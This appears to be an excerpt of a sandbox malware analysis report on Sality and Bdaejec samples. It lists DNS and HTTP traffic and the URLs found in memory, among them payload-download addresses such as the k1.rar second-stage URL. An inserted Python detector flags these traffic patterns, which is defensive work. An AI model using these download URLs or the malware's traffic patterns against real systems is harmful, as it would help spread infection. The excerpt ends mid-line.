          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ce2fff=121614327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
          Source: global trafficHTTP traffic detected: GET /xs.jpg?e14213=73812575 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f4c967=160423430 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
          Source: global trafficDNS traffic detected: DNS query: althawry.org
          Source: global trafficDNS traffic detected: DNS query: www.careerdesk.org
          Source: global trafficDNS traffic detected: DNS query: arthur.niria.biz
          Source: global trafficDNS traffic detected: DNS query: amsamex.com
          Source: global trafficDNS traffic detected: DNS query: apple-pie.in
          Source: global trafficDNS traffic detected: DNS query: ahmediye.net
          Source: global trafficDNS traffic detected: DNS query: g2.arrowhitech.com
          Source: global trafficDNS traffic detected: DNS query: ampyazilim.com.tr
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:00:07 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:00:11 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
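Added analyst example, not part of the Joe Sandbox report: a small detector that parses the request lines recorded above and flags the two traffic shapes they show. The Sality URL-list fetches are GETs for an image-named file (xs.jpg and xs2.jpg on the wire; home.gif and logo.gif in memory) with a six-hex-digit=decimal query, Cache-Control: no-cache and a hard-coded IE7/Windows XP User-Agent; the Bdaejec stage is a plain-HTTP download of /cj//k1.rar from ddos.dnsnb8.net on port 799. The sample requests are the report's rows re-separated with CRLF as they were on the wire; the www.example.com request and its Firefox User-Agent are a constructed benign control. The `?1` request to ampyazilim.com.tr, which does not fit the hex=decimal shape, is caught by a weaker no-cache rule rather than dropped.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Requests reconstructed from the sandbox rows above, header fields separated by
# CRLF as on the wire. The last request is a constructed benign control
# (hypothetical host and User-Agent), included to show what is *not* flagged.
SAMPLE_REQUESTS = [
    "GET /xs.jpg?5827cf=5777359 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"
    "Host: ahmediye.net\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /images/xs2.jpg?1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"
    "Host: ampyazilim.com.tr\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /cj//k1.rar HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: ddos.dnsnb8.net:799\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /images/logo.png?v=3 HTTP/1.1\r\n"  # constructed benign control, not from the report
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\r\n"
    "Host: www.example.com\r\n"
    "Accept: image/avif,image/webp,*/*\r\n\r\n",
]

# File names the sample requests in this report (xs.jpg/xs2.jpg live, the .gif names in memory).
SALITY_IMAGE_NAMES = {"xs.jpg", "xs2.jpg", "home.gif", "logo.gif", "logof.gif"}
SALITY_QUERY = re.compile(r"^[0-9a-f]{6}=\d+$")  # e.g. 5827cf=5777359
# The sample sends an IE7-on-Windows-XP User-Agent regardless of the real OS.
LEGACY_UA = re.compile(r"MSIE [67]\.0; Windows NT 5\.[12]")


@dataclass
class Request:
    method: str
    path: str
    query: str
    headers: dict


def parse_request(raw: str) -> Request:
    """Parse the head of an HTTP/1.x request; header names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, query, headers)


def host_port(req: Request) -> tuple[str, int]:
    # urlsplit does the host:port split (and IPv6 brackets) for us.
    parts = urlsplit("//" + req.headers.get("host", ""))
    return parts.hostname or "", parts.port or 80


def classify(req: Request) -> list[str]:
    """Reasons this request looks like Sality/Bdaejec traffic; an empty list means clean."""
    reasons = []
    _host, port = host_port(req)
    if port != 80:
        reasons.append(f"plain HTTP to non-standard port {port}")
    filename = req.path.rsplit("/", 1)[-1].lower()
    if filename in SALITY_IMAGE_NAMES:
        if SALITY_QUERY.match(req.query):
            reasons.append("Sality-style image fetch with <hex6>=<int> cache-buster")
        elif req.headers.get("cache-control", "").lower() == "no-cache":
            reasons.append("Sality-style image fetch with Cache-Control: no-cache (weaker)")
    if LEGACY_UA.search(req.headers.get("user-agent", "")):
        reasons.append("hard-coded IE7/XP User-Agent")
    return reasons


def triage(raw_requests) -> dict:
    """Map each flagged host to the sorted set of reasons; clean hosts are omitted."""
    verdicts = {}
    for raw in raw_requests:
        req = parse_request(raw)
        host, _port = host_port(req)
        reasons = classify(req)
        if reasons:
            verdicts.setdefault(host, set()).update(reasons)
    return {h: sorted(r) for h, r in sorted(verdicts.items())}


if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_REQUESTS).items():
        print(f"{host}: " + "; ".join(reasons))
```

Run as a script it prints one line per flagged host. Two caveats the rows themselves support: ahmediye.net answered these fetches with 404 (the two responses immediately above), so a rule keyed on a successful download would miss the infection, and the legacy User-Agent alone is only corroborating, which is why it is emitted as a separate reason rather than as a verdict.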
          Source: rksowY.exe, 00000002.00000003.2147302621.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
          Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://127.0.0.1/R2_2021/ServerInfo.json
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.193.19.14/logo.gif
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a3inforservice.com.br/images/logof.gif
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accnet.ca/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?5827cf=5777359
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?5827cf=5777359V
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ahmediye.net/xs.jpg?e14213=73812575
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=26070625
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=260706254
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=26070625d
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?a6d450=65599968
          Source: 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1.
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?6cbf0c=21380388
          Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430
          Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430M
          Source: 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed;0
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430edK2
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ellNoRoam
          Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430j
          Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430x
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?549590=27716560
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?ce2fff=94588921
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?ce2fff=945889216
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?554c8c=39131092
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?ce2fff=121614327
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=48356010
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=483560101
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=48356010a
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310C
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310T
          Source: rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
          Source: rksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
          Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar4
          Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar6
          Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
          Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarL
          Source: rksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
          Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
          Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 